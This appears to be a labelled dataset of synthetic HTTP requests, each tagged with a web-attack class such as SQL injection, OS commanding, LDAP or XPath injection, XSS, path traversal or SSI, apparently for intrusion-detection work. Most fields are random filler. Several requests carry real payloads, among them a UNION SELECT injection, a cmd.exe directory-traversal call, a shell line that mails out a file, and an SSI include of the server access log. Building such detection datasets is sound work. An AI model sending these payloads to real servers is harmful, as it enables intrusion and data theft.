Proxy-Authorization: Basic c2VhaW46Ykh0U3A=
Authorization: Digest nonce
Range: 7008-71
Referer: http://www.ETba.cz/neLs6w/iR05s/XigUs/t9olgee/aocs.conf
TE: gzip,deflate
User-Agent: Mozilla/1.8 (X11; U; SunOS sun4u 6.7; ew-ii; rv:4.0.2) Gecko/44863338
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5641x613
Via: 6.5 232.80.54.80, 4.3 www.todEeree.png
Transfer-Encoding: mnnhta
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 342 www.haYt.jpeg "eunI" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43713
Start - Id: 41186
class: SqlInjection
GET /uAG-f/pMeYsdaEbWO_YGs/wgetselectIW4/hrnk3dimc/n3aurOkonpaov.bin?hhb=p+fi&rzuddng9rtn6e=543213&CnhpO=f7sfamo&eonOidNhtsnwu2w=v2qvso&zicmdDVQ1=0&catijsock_stream8X_NvGis=lixr&izu-4=wei&oh8jojnddor=oeg&pz8GIsya1LrR=wtbowinntpAnetcateupdateujr&yilrYbeibGnmamt=60070297&riunr=idcsock_streamlinkwl&xt=r0r-&msn9bn=jnvnyraohs HTTP/1.0
Host: 172.152.15.163
Connection: keep-alive
Accept: image/jpeg;q=0.5
Accept-Charset: us-ascii;q=0.9, utf-8, windows-1257
Accept-Encoding: identity;q=0.6, deflate, gzip;q=0.1, gzip;q=0.1, compress;q=0.2
Accept-Language: '    OR     'le1' LIKE    'aze%25
Cache-Control: no-store
Client-ip: 151.63.160.140
Cookie: Zechl8d=mGsosrepat0i;KM-Bbt4nIlocation97=qr1tAt5oiesfr>h;wheredTZYvMpwhere=-bealleacnnaSl;8RQROE3i@RD=vcU_pd6
Cookie2: $Version="0"
Date: Wed, 21 Sep 05 08:53:45 CET
ETag: "ThY1cTTEqxmOVuYl"
Expect: sfaoe7t=eotaah
From: enng6@dnse.biz
If-Modified-Since: Sat, 31 Mar 07 06:30:22 GMT
If-Unmodified-Since: Sun, 11 Dec 05 13:06:08 CET
If-Match: *
If-None-Match: "ceix1PT.YXfQIG7"
If-Range: "kYzYHV1khiCHsYn-"
Max-Forwards: 179
MIME-Version: 2.7
Pragma: dqp7='ruN'
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: sda5A h990hii=Siyhyle
Range: 5154-283,-781,-71
Referer: http://www.r2at2.net/5gey/azattehq/0etp/ceahslh/tnBods8.exe
TE: gzip,trailers,trailers
Trailer: Date
User-Agent: Mozilla/4.6 (X11; U; Open BSD i586 4.8; hc-tn; rv:4.4.4) Gecko/47304278
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 724x926
Via: 8.9 9.233.143.28, 3.9 213.69.175.21, 4.4 143.168.216.31:1
Transfer-Encoding: identity
Upgrade: sbssn/4.1, imo7o/6.7, etiif/1.0, tss2b/2.2
Warning: 570 20.88.197.170 "eeqmmpr1httetaoyox" 
X-Forwarded-For: 105.89.56.0
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41186
Start - Id: 43066
class: OsCommanding
POST /7Ua/SY%uQZeyRnS-/2jAUDf-oD0dWRX/SNceotulsxdo9uslSm/spnQdg/ihiNrrNgieoaite.asp? HTTP/1.0
Content-Length: 218
Content-Language: jeam,e
Content-Encoding: deflate
Content-Location: /idamrm/hSclyt/3Icd.cgi
Content-MD5: aTdlYWVhUG1oM2NuZURuSA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Oct 08 21:59:43 GMT
Last-Modified: Thu, 08 Jun 06 17:30:51 CET
Host: 222.18.143.7
Connection: lzgn
Accept: */*
Accept-Charset: windows-1258, koi8-r, shift_jis;q=0.8, iso-2022-kr;q=0.4
Accept-Encoding: *
Accept-Language: 58djHaes-nlbei, 96u7mner-ugt;q=0.4, lnnne-pzosU6t;q=0.8, 9dou-lEqowafa;q=0.6, Swu-ret3
Cache-Control: no-cache
Client-ip: 38.62.165.132
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="48"
Date: Sat, 21 Mar 09 11:57:21 CET
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: ni1y
From: sTleEdu@dtAttFd.de
If-Modified-Since: Mon, 12 Jul 04 03:02:08 CET
If-Unmodified-Since: Fri, 19 Sep 08 03:06:31 GMT
If-Match: "6a@Cdu7EoW85L7u"
If-None-Match: *
If-Range: Thu, 18 Sep 08 08:59:25 CET
Max-Forwards: 8410
MIME-Version: 7.0
Pragma: i0nedc5='eiy'
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: k4sb2d a6el=bejnmwts
Range: -86761,779-
Referer: http://Bsoohraa.net/jnhia/nepnns.css
TE: trailers,trailers
Trailer: Accept
User-Agent: pjehdx/1.0
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: oeni/1.6 69.127.27.89:082
Transfer-Encoding: compress
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wpihttp7fCF@=90878207&9noiu8ii=tea dsueb&49annanE=poe2sn3io&o1=iiei&scriptJnhM=a5joscriptiRTigt&GeisIj=4900&imas=a3BbjiE&ittnoslliSOs=mail uEtmt@evohqhsre.cbOgP2.gov   <<   /tmp/wu.c;&nio=016&n7ennl3e2=d?

End - Id: 43066
Start - Id: 37559
class: LdapInjection
PUT /c7DlctBn3NB4RfmwK/gswwQuh6tieHptIdhln8/bzjEWqAC7HUyep7x/mxEU@Q4FU@86D/l8b7adqkX1Ba.fOjl/a85ngt/Oie/eC/yFK8Cyf4y/oIevt.asmx? HTTP/1.0
Content-Length: 140
Content-Language: q8bss8ec,Tesew,uiimm
Content-Encoding: deflate
Content-Location: http://dlosng0.gov/oicmdf4a/rdcear/tli1ggar/r6oTh/7eeho.pdf
Content-MD5: NWlDbm5ld244RWM3cGVsbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Apr 05 03:41:04 UTC
Last-Modified: Sun, 03 Jun 07 03:02:09 CET
Host: www.etta.uk:80
Connection: r5rax2
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.0, compress;q=0.6, gzip;q=0.6, deflate
Accept-Language: itl-lut0ze
Cache-Control: no-cache
Client-ip: 229.190.23.163
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="0"
Date: Mon, 01 Sep 08 03:49:51 UTC
ETag: "CiFBiQN6uzs39biv-lXG"
Expect: liIlS
From: oenu@5hnawusete.de
If-Modified-Since: Thu, 14 Jan 10 05:27:36 UTC
If-Unmodified-Since: Tue, 13 Dec 05 13:57:02 CET
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: *
If-Range: *
Max-Forwards: 1055
MIME-Version: 9.9
Pragma: 1eu='g0cA'
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: Basic ZG81YU86c2huaXJO
Range: -78728,9752-,0169-21
Referer: /ttrMh/a4isb.nsf
TE: deflate
Trailer: If-None-Match
User-Agent: uYj.DF http://www.ruwcoE.biz
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1680x065
Via: HTTP/1.9 8.76.113.134, 0.4 www.akmm8.tiff, HTTP/9.7 162.236.199.162
Transfer-Encoding: deflate
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ksaujAtctOspr=oQcTdzmyEqG&delex8wafi=m0tinputeoaiframe&selNEepthae0bu=7&zr5aepr=sowxo)( | (IO=*)&rtcnipea=kitt&yM8baS6Pw=5139782

End - Id: 37559
Start - Id: 35297
class: SqlInjection
GET /ePetnt43nIsipO5/ltssssAzuz/eCoIg_DJI7RF-Z@/xcerd/vBpOHsinclude/l9itssxte8/v0dfl.jpg?tlG9dt5eyza5r4D=rF%3D%5Cn&oCdnruttaa=anoowhtipagul&tee1uuei=+&Fwd7eyimY=noidvscuIaTZsLsan&rcatbeinntc0y=oad8tu4TT&tt5ro8art=rabzh9mmny0sc&luese=4630818&aynntj=518714&esswotOtueeevT=%27%29+++++UNION+++ALL++++SELECT++++lee+++++FROM++++vsgnjl3en++WHERE+++%28++%27%27++%3D+++%27 HTTP/1.0
Host: www.mq0ihrf6.com
Connection: close
Accept: image/*;q=0.6, audio/basic, video/quicktime;q=0.9
Accept-Charset: iso-2022-jp;q=0.2, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 213.3.132.26
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="0"
Date: Wed, 02 Aug 06 09:28:42 UTC
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Mon, 29 May 06 19:30:53 UTC
If-Unmodified-Since: Fri, 24 Nov 06 01:20:17 CET
If-Match: "G5n2XBPwpNz_tINp"
If-None-Match: "nKhvYL@HW57.tz6."
If-Range: Fri, 01 Jul 05 16:03:33 GMT
Max-Forwards: 5604
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="wwob"
Authorization: Digest nonce
Range: 930-456,2355-
Referer: http://www.g9p0Mrrw.st/ufaibrr.swf
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 9.9; eo-ao; rv:6.2.6) Gecko/51037710
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 3.3 www.eir4am.htm, 7.1 www.jkne.png:3, 8.1 135.227.95.210
Transfer-Encoding: deflate
Upgrade: dn44o/1.3
Warning: 350 4.215.62.223 "thrrt0nq8ftawYt2rl5" "Sun, 30 Nov 08 19:51:23 GMT"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35297
Start - Id: 46555
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.0
Host: 116.32.173.121
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 142.228.77.57
Cookie: lsdBHIvY49n.=7Z.H;Ux1evalT8=u/;Ise=0c7;rot=+h6;anela=ostyle/ suinsert6execenbat;ew=e@aL\ts80d4dii0e
Cookie2: $Version="6"
Date: Fri, 11 May 07 08:24:26 GMT
ETag: "pxEyZUXsotp0fFplc7L_"
Expect: rltlnel=sLnE
From: ns7rogjc@npah.it
If-Modified-Since: Tue, 25 Aug 09 03:59:34 CET
If-Unmodified-Since: Mon, 04 Jan 10 10:12:41 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Jan 10 19:10:09 UTC
Max-Forwards: 7828
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic bGEydG9TNHQ6c2VuaWls
Range: 739-
Referer: /hreoRbi/0tan/hebErn3N.js
TE: trailers,chunked;q=0.9,gzip
Trailer: Pragma
User-Agent: Mozilla/9.9 (compatible; Konqueror/4.7; Open BSD i586; nhos; eiyi3gkeo; ymavmayimh)
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/7.5 200.196.202.38, 8.2 www.nrfluseq.shtml, FTP/6.8 217.194.10.27
Transfer-Encoding: sihz
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46555
Start - Id: 41957
class: SqlInjection
GET /aroFbtodoseoeru/amp4@M6xHJxfMdkCWf/rTEGcUFpI-XP/eDroo9hHsrETnsal/ever5G1ijdnffsi1snIA/SSRGjV/wn@QweOto/tE/fedr.jsp?stleYnomgp=iefs8gmThVomd&rnbw=6&lzj1m=eDY.HTf.hh&mse=am%25l+ee%5Dpp%2BuskU6HS&7bOah=e8ynrte&HNIY3wRCJ=OR+++++70505%3D70505&Tnnfhgdllst6nei=g+r&se4Thitfhdsine=aUvm%40Ta&nyiniLohe0ahtas=2tawp-&d9n=rwgs&0ijTinlRctsehu=inti&ttlG=eMvM7&oSd=evpR4G%40 HTTP/1.1
Host: www.nenccOz6.net:80
Connection: neeEx1tR
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, compress;q=0.7, identity, compress
Accept-Language: 4tdCrneC-umrtie;q=0.4, isi-xodeic;q=0.6, ld-a;q=0.5
Cache-Control: no-store
Client-ip: 54.102.14.216
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="80"
Date: Thu, 28 Feb 08 09:57:08 CET
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: lbrsawDh@elfoa4b.fr
If-Modified-Since: Sun, 18 Jan 04 21:39:31 UTC
If-Unmodified-Since: Thu, 08 Oct 09 16:46:05 GMT
If-Match: "YgXrPQ.OTzXjmpN"
If-None-Match: "lzrt-akqZh-eIEpQvG6U"
If-Range: "CvJbYmQVJKxHxyfvU"
Max-Forwards: 1217
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: hnhE hDht5a=uhdg0rxt
Range: 170-12,11579-8643,1-
Referer: /gi9em.html
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/4.6 (Windows; U; WinNT 9.2; qt-ie; rv:5.2.1) Gecko/14854152
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: Goema; 1mdewo=fmrid0
Upgrade: ep1Mri/9.9, tcn/2.5, elb8/5.8, eeNie/7.6
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41957
Start - Id: 48333
class: XPathInjection
GET /nfU6raiaoDe/sffs5S1S/rs/h9s.gif?tTDaoonrtups=s+orio HTTP/1.1
Host: www.epqho.org
Connection: keep-alive
Accept: video/quicktime, video/mpeg
Accept-Charset: windows-1251;q=0.4, shift_jis;q=0.3
Accept-Encoding: 
Accept-Language: i7yifl-t8enheTc;q=0.8, edte-iyeb, e3gfpie-4hdyfa
Cache-Control: no-store
Client-ip: 81.91.23.142
Cookie: jh=bodyoeF6z8neadminld;uttNxbdtrhcgs=O3wgetg rdor
Cookie2: $Version="474"
Date: Mon, 17 Apr 06 10:52:32 UTC
ETag: W/"MzE5RqeCenXQ4Y_-"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Tue, 03 Feb 04 03:30:05 GMT
If-Unmodified-Since: Sun, 13 Feb 05 16:54:05 CET
If-Match: "Kq0u4FsN6qqfams"
If-None-Match: *
If-Range: Tue, 20 Nov 07 05:08:30 GMT
Max-Forwards: 5864
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: NTLM c2lpbmRlaGdvdXlpb29vZXBudG9vbHN3YmZubm9jZXpvaTJzYXc4aA==
Range: 8313-,-86247,250-55725
Referer: http://www.eaewoe.org/eetuofw9/6p2cl/dz9h/lvhe.nsf
TE: deflate;q=0.6,chunked;q=0.0
Trailer: Warning
User-Agent: ewzr' or  path/child::node()[position()=N]   or 'evbso' ='
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 433x249
Via: hmlYli/8.3 117.32.197.73, FTP/2.7 225.36.72.236
Transfer-Encoding: gzip
Upgrade: eta/7.4, auRa/8.4
Warning: 922 www.shedURse.gif "43Mra" 
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 6875195
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48333
Start - Id: 44634
class: PathTransversal
GET /drTaDiGnde/aYlxtRvj9.cfm?hnEgc=456&EortosaD=64938&o6Nlib=431457&1-I3zT4Cq=passthruqgeemochaxp&ewsamorn=linki%2Fy&narwl=31765777&ja0tEOmh0sgD=s_YCWd&hsazieenrbvcssi=t37nT%2B++pdelete&edoiiycsiha=83466455&OfX0-7U1p=614528&iisct=dnautoexec&snMceo4rn=nCnRk2N&ih2kemhlac=ncsTaEdoctorn2fift HTTP/1.1
Host: www.e2aresnlm.com:80
Connection: close
Accept: audio/*;q=0.4, video/*
Accept-Charset: windows-1254, iso-8859-8, macintosh, euc-kr;q=0.3, x-mac-greek
Accept-Encoding: %2e%2e.\%252f/\%252f/...\%252e..%2e
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 95.91.76.121
Cookie: kdr5gM4mAfpogsh=391450525;tl=lo3r7DeT;ptOatts=uktopenor;4DZskIL4B=716110;V54-WRS=69391
Cookie2: $Version="462"
Date: Sun, 07 Feb 10 15:42:06 GMT
ETag: "qEE3WBOgXpli.Ah_CI"
Expect: 100-continue
From: fsdIshc@oassmaqEaj.fr
If-Unmodified-Since: Fri, 14 Nov 08 01:23:31 UTC
If-Range: Sat, 29 Nov 08 04:39:01 GMT
Max-Forwards: 7398
Pragma: q=iv9iy
Proxy-Authorization: Basic ZXVibmw6dGVybnI=
Referer: /2esrc.js
TE: trailers,chunked;q=0.6,trailers
User-Agent: Mozilla/4.1 (X11; U; Open BSD i386 9.1; vR-iZ; rv:6.6.9) Gecko/65098785
UA-OS: FreeBSD
Via: 6.4 225.28.156.119
Upgrade: asau/3.9, tuhqe/5.7, wioc10/0.3
----: ---------------------------

null

End - Id: 44634
Start - Id: 48612
class: XPathInjection
PUT /jx15v/zXKHi/icrr/EJQ41u9xEfhttpF/onQxmlformfR3samB.aspx? HTTP/1.1
Content-Length: 289
Content-Language: azgtdT,e1ee
Content-Encoding: compress
Content-Location: http://zmnoaa.org/usmiot/s7ne.cfm
Content-MD5: dHNGUG51Yml0eG1vb3NodQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Jul 06 17:00:26 UTC
Last-Modified: Fri, 06 Mar 09 19:50:11 UTC
Host: www.iiser.uk
Connection: close
Accept: audio/x-wav;q=0.3, image/*;q=0.9
Accept-Charset: cp-936, x-mac-icelandic;q=0.3
Accept-Encoding: 
Accept-Language: vay3xw-055P;q=0.4
Cache-Control: no-cache
Client-ip: 135.188.231.70
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Sun, 11 Jul 04 24:50:17 CET
ETag: "pJxJ92AJ3eoiDG3vZ9"
Expect: 100-continue
From: yro7a@eroeoAetn.gov
If-Modified-Since: Tue, 25 Nov 08 10:20:34 CET
If-Unmodified-Since: Wed, 05 Jan 05 10:37:36 CET
If-Match: *
If-None-Match: "51DffmBOSGObR2BmGo."
If-Range: *
Max-Forwards: 674
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Basic c3hjcHU6ZWUyYWVz
Range: 3-574
Referer: /DaaaQgOe/pztc/9tnp/aliets.css
TE: trailers,gzip;q=0.9,trailers
Trailer: Referer
User-Agent: Mozilla/9.4 (compatible; MSIE 2.8; Win98; shdsacegs)
UA-CPU: Sparc
UA-Disp: 1112,294,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: fssdh/6.8 www.jmeetos.gif, y4STrI/4.2 26.62.232.149
Transfer-Encoding: deflate
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 3403720047412746
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

aldftu9xsirhvo=bj8yih/d/In/child::node()[     position()=95]     | m3/edge/Earb/child::text()[position()=799]    or    'NLg'  =    '&iC= Lba&uEdir4PwaC=194352662&gYaThna=1&otn5o=nKEBIPIqQ&ein81sSnbrr=t3d4Ij2&eRdhezyetHedine=3085316

End - Id: 48612
Start - Id: 36502
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 207.203.40.136
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: euc-tw;q=0.0, x-mac-chinesetrad;q=0.7, hz-gb-2312;q=0.0, euc-kr;q=0.4
Accept-Encoding: identity;q=0.4, identity, compress;q=0.7, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 71.53.140.2
Cookie: o4sthoErtnsv3i=ioIYyoduutcey;acm=95;b9n9t6gah=p@4T6;ues3shfecttre7=064214
Cookie2: $Version="050"
Date: Mon, 27 Mar 06 02:56:15 CET
ETag: "PbL-0SjZXzb3X6N9tt"
Expect: atcEeo
From: gshio@xxma.be
If-Modified-Since: Thu, 07 May 09 22:48:44 UTC
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "lMqOAnisi3zsqiE"
If-None-Match: *
If-Range: Wed, 20 Jan 10 05:21:43 UTC
Max-Forwards: 9509
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: osnreg sghsw=aqOrAfHc
Range: 998505-,-0540,815-
Referer: /Let9r.txt
TE: trailers,trailers,chunked;q=0.5
Trailer: From
User-Agent: 8Oswl (aXR.HCc9)
UA-CPU: MIPS
UA-Disp: 5117,829,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/9.2 193.240.86.205:954, 3.8 www.lettoAsn.png
Transfer-Encoding: du620; dtea2=y57rt
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36502
Start - Id: 39664
class: SSI
GET /rwmhjS/tjllwns2ovn/xKFySM-/Z8Z/sLartdfrjraeib/WECY@-b.htm?yhaRelosdp=uM-DBz&CF3OMkLEJ=%3C%21--+++++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&hts=417 HTTP/1.1
Host: 60.168.192.49
Connection: Ondh
Accept: */*
Accept-Charset: iso-8859-1, hz-gb-2312;q=0.3, iso-8859-8-i;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: min-fresh=9228
Client-ip: 51.157.12.104
Cookie: T_3UgY=iva ;iaee=b5Wa;rp8scoxb=5966;on=tb 2a3ddmdx4zH;onninAx=5482205783;stvrsr8=pbinhssbin 
Cookie2: $Version="811"
Date: Sun, 02 Dec 07 01:49:32 UTC
ETag: W/"DjzoEKQNI9ad3TMI8QLe"
Expect: bOXslStq
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Wed, 09 Feb 05 13:16:29 CET
If-Unmodified-Since: Sun, 17 Jul 05 13:38:19 GMT
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: "G7ifQuf7D1dgv_5QN6"
If-Range: *
Max-Forwards: 9439
MIME-Version: 3.9
Pragma: 5gedma=abaeI
Proxy-Authorization: Digest opaque="mwba"
Authorization: Basic YnRlczpuc29lcGNlMg==
Range: -7190
Referer: /3Ctwh5/olO6eo/etotnz/7ges/ni0cla.jsp
TE: trailers,trailers,chunked
Trailer: Accept-Language
User-Agent: s9utSgoe23waeeu9tsei
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8969x195
Via: 1.0 www.oOl2.tiff
Transfer-Encoding: identity
Upgrade: keeao/1.8, ytF/7.1
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39664
Start - Id: 37938
class: LdapInjection
GET /sn6UnF4d/dX1TU6q0eZuf/tD2pdqI@Uwx.A/roau2ir4/ntpOP6UWcRN.pl?tN=hRsme&tru2etratd=0&mrobuoeu3n3t=qFE&ientrsme2=curtfu&edliNee6he=roaehy&oriZlagriOecF=28&hboot.ini1KqR1Hc=9&8Emu4ie=%29%28%7C++++%28+cn%3D*o%27brien*++%29%28mail+++%3D*o++%27brien*%29+++&UrranYbhtal7g=16&tspp7dde55e=3659003&seEhs=ee%3F%3D&uc0z9rs=5323&neteHlor4ycDm7=014 HTTP/1.0
Host: www.biueImun.biz
Connection: close
Accept: */*;q=0.9
Accept-Charset: shift_jis
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 93.212.172.244
Cookie: sh=22413753
Cookie2: $Version="132"
Date: Mon, 17 Apr 06 01:34:13 CET
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: lue5olis
From: heal@ehrTn.gov
If-Modified-Since: Tue, 20 Apr 04 05:01:40 UTC
If-Unmodified-Since: Thu, 07 Feb 08 13:18:42 CET
If-Match: "EiunJW4dtzXReckC5Dy"
If-None-Match: *
If-Range: Tue, 19 Sep 06 13:15:13 CET
Max-Forwards: 8
MIME-Version: 8.6
Pragma: fl9='iqCgkts'
Proxy-Authorization: Basic aGVuQXQ0aG86c2xweGg0bmU=
Authorization: Basic TGFxZ2k6eWRoMA==
Range: 90559-
Referer: /tsCt/eeia/pXbunalx.wmn
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (X11; U; Open BSD i586 4.5; fi-le; rv:0.3.9) Gecko/22554399
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 334x8610
Via: 5.7 247.232.242.169
Transfer-Encoding: identity
Upgrade: vtsi/8.4, niogL/5.5, sra/2.0
Warning: 090 www.Bnmbl7et.jpeg:1 "vijmhndae9nl7j6rggi" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37938
Start - Id: 37299
class: LdapInjection
PUT /otienus9oa0daza2/m-iframent1/ncrEhi/j8..fC7tvH/iiUSannxo/tJp_x3hHk8ec4xcW0h7.bin? HTTP/1.0
Content-Length: 50
Content-Language: ey,hspe5
Content-Encoding: gzip
Content-Location: /Volig/ittb/lqhd/gSlnan/cadE.doc
Content-MD5: dHU2YWlzNmVwak5vcnVkZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Dec 08 02:27:17 CET
Last-Modified: Thu, 26 Nov 09 17:11:20 UTC
Host: www.iw8d3ow.uk:4820
Connection: close
Accept: image/gif;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.4
Cache-Control: asoopem=Neiprj
Client-ip: 221.200.82.177
Cookie: hras=)  (  |(displayName=had*)    (name =   had*   )(    mail=had* );Me0e=eobephin;Uzw@-@s2HxRP=hTnAVwl8x;1oO97=9068;dN5script24=nn9e8eTMmhs
Date: Mon, 07 Nov 05 01:35:36 GMT
ETag: W/"y9bRy..8kkx_hgD"
Expect: 100-continue
From: 5nwNusS@hcioumsnro.fr
If-Modified-Since: Mon, 02 Nov 09 21:37:43 CET
If-Unmodified-Since: Sat, 22 Apr 06 02:19:44 GMT
If-Range: "IZhYcrFWeBaF6Y6eHb"
Max-Forwards: 0578
Pragma: no-cache
Authorization: Basic c3UydHZvM2U6c25udGVv
Range: -73050,075998-
Referer: http://www.obienIir.de/heyswb/amii/taeBz3I/hwoefetW/nzhslot.dll
TE: trailers,chunked
User-Agent: Yaddtfsr3a (a462FzzM; o6jWHIZCbg; eXBTxJoa)
Transfer-Encoding: gzip

rpSftf8rcectrw=srt9bgsound&-_hu5vuNNC1=vbscript&

End - Id: 37299
Start - Id: 38496
class: LdapInjection
